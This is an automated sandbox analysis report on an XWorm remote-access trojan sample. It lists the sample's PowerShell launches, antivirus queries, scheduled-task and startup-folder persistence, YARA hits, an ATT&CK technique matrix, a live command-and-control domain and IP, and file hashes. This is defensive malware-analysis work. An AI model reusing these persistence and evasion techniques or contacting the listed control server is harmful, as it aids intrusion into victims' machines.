            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\SYSTEMQueries volume information: C:\Users\user\AppData\Roaming\SYSTEM VolumeInformation
            Source: C:\Users\user\AppData\Roaming\SYSTEMQueries volume information: C:\Users\user\AppData\Roaming\SYSTEM VolumeInformation
            Source: C:\Users\user\AppData\Roaming\SYSTEMQueries volume information: C:\Users\user\AppData\Roaming\SYSTEM VolumeInformation
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: 72OWK7wBVH.exe, 00000000.00000002.2984813735.000000001B674000.00000004.00000020.00020000.00000000.sdmp, 72OWK7wBVH.exe, 00000000.00000002.2984813735.000000001B6BB000.00000004.00000020.00020000.00000000.sdmp, 72OWK7wBVH.exe, 00000000.00000002.2931316903.0000000000916000.00000004.00000020.00020000.00000000.sdmp, 72OWK7wBVH.exe, 00000000.00000002.2984813735.000000001B620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 72OWK7wBVH.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.72OWK7wBVH.exe.510000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 72OWK7wBVH.exe PID: 6776, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 72OWK7wBVH.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.72OWK7wBVH.exe.510000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 72OWK7wBVH.exe PID: 6776, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		11
            Masquerading            		OS Credential Dumping221
            Security Software Discovery            		Remote Services11
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		2
            Registry Run Keys / Startup Folder            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		1
            DLL Side-Loading            		2
            Registry Run Keys / Startup Folder            		131
            Virtualization/Sandbox Evasion            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		11
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture11
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575210 Sample: 72OWK7wBVH.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 40 if-sensors.gl.at.ply.gg 2->40 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 12 other signatures 2->50 8 72OWK7wBVH.exe 6 2->8         started        13 SYSTEM 2->13         started        15 SYSTEM 2->15         started        17 SYSTEM 2->17         started        signatures3 process4 dnsIp5 42 if-sensors.gl.at.ply.gg 147.185.221.24, 24891, 49737, 49790 SALSGIVERUS United States 8->42 38 C:\Users\user\AppData\Roaming\SYSTEM, PE32 8->38 dropped 54 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->54 56 Protects its processes via BreakOnTermination flag 8->56 58 Bypasses PowerShell execution policy 8->58 66 2 other signatures 8->66 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 19 8->24         started        26 2 other processes 8->26 60 Antivirus detection for dropped file 13->60 62 Multi AV Scanner detection for dropped file 13->62 64 Machine Learning detection for dropped file 13->64 file6 signatures7 process8 signatures9 52 Loading BitLocker PowerShell Module 19->52 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            72OWK7wBVH.exe76%ReversingLabsWin32.Exploit.Xworm
            72OWK7wBVH.exe100%AviraTR/Spy.Gen
            72OWK7wBVH.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\SYSTEM100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Roaming\SYSTEM100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\SYSTEM76%ReversingLabsWin32.Exploit.Xworm

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            if-sensors.gl.at.ply.gg100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            if-sensors.gl.at.ply.gg
            		147.185.221.24
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              if-sensors.gl.at.ply.ggtrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1770585947.0000020AD3FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1861905123.0000014DA0450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2015139866.000002259459F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1753519383.0000020AC41B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D90609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.000002258475A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1753519383.0000020AC41B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D90609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.000002258475A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1770585947.0000020AD3FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1861905123.0000014DA0450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2015139866.000002259459F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.microsoft.copowershell.exe, 00000001.00000002.1779448718.0000020ADC753000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://aka.ms/pscore68powershell.exe, 00000001.00000002.1753519383.0000020AC3F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D903E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.0000022584531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FC01000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.microsoft.cpowershell.exe, 0000000B.00000002.2226725098.00000167381D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name72OWK7wBVH.exe, 00000000.00000002.2942146763.0000000002861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1753519383.0000020AC3F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D903E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.0000022584531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FC01000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.microspowershell.exe, 00000001.00000002.1779023894.0000020ADC582000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034970056.000002259C890000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            147.185.221.24
                                            		if-sensors.gl.at.ply.ggUnited States
                                            		12087SALSGIVERUStrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1575210
                                            Start date and time:2024-12-14 18:53:05 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 24s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:19
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:72OWK7wBVH.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:e58e3513066ca537d090cdfae72904220a90ba3b081bbd9d49318e27788c5729.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@19/21@1/1
                                            EGA Information:
                                            • Successful, ratio: 12.5%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 69
                                            • Number of non-executed functions: 8
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63, 172.202.163.200, 173.222.162.32
                                            • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target SYSTEM, PID 4556 because it is empty
                                            • Execution Graph export aborted for target SYSTEM, PID 5480 because it is empty
                                            • Execution Graph export aborted for target SYSTEM, PID 5928 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 6564 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 6900 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 744 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 8 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: 72OWK7wBVH.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            12:54:01API Interceptor56x Sleep call for process: powershell.exe modified
                                            12:54:55API Interceptor166337x Sleep call for process: 72OWK7wBVH.exe modified
                                            17:54:55Task SchedulerRun new task: SYSTEM path: C:\Users\user\AppData\Roaming\SYSTEM
                                            17:54:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnk

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            147.185.221.24aZDwfEKorn.exeGet hashmaliciousXWormBrowse
                                              HdTSntLSMB.exeGet hashmaliciousXWormBrowse
                                                file.exeGet hashmaliciousXWormBrowse
                                                  file.exeGet hashmaliciousXWormBrowse
                                                    NhoqAfkhHL.batGet hashmaliciousUnknownBrowse
                                                      a4lIk1Jrla.exeGet hashmaliciousNjrat, RevengeRATBrowse
                                                        W6s1vzcRdj.exeGet hashmaliciousXWormBrowse
                                                          u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                                            aOi4JyF92S.exeGet hashmaliciousXWormBrowse
                                                              PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse

                                                                Domains

                                                                No context

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                SALSGIVERUSaZDwfEKorn.exeGet hashmaliciousXWormBrowse
                                                                • 147.185.221.24
                                                                HdTSntLSMB.exeGet hashmaliciousXWormBrowse
                                                                • 147.185.221.24
                                                                7laJ4zKd8O.exeGet hashmaliciousXWormBrowse
                                                                • 147.185.221.18
                                                                file.exeGet hashmaliciousXWormBrowse
                                                                • 147.185.221.24
                                                                testingg.exeGet hashmaliciousNjratBrowse
                                                                • 147.185.221.19
                                                                Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                • 147.185.221.224
                                                                system404.exeGet hashmaliciousMetasploitBrowse
                                                                • 147.185.221.19
                                                                Discord.exeGet hashmaliciousAsyncRATBrowse
                                                                • 147.185.221.18
                                                                CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                • 147.185.221.22
                                                                file.exeGet hashmaliciousXWormBrowse
                                                                • 147.185.221.24

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SYSTEM.log

                                                                Download File
                                                                Process:C:\Users\user\AppData\Roaming\SYSTEM
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):654
                                                                Entropy (8bit):5.380476433908377
                                                                Encrypted:false
                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Preview:@...e...........................................................

                                                                C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\72OWK7wBVH.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):29
                                                                Entropy (8bit):3.598349098128234
                                                                Encrypted:false
                                                                SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
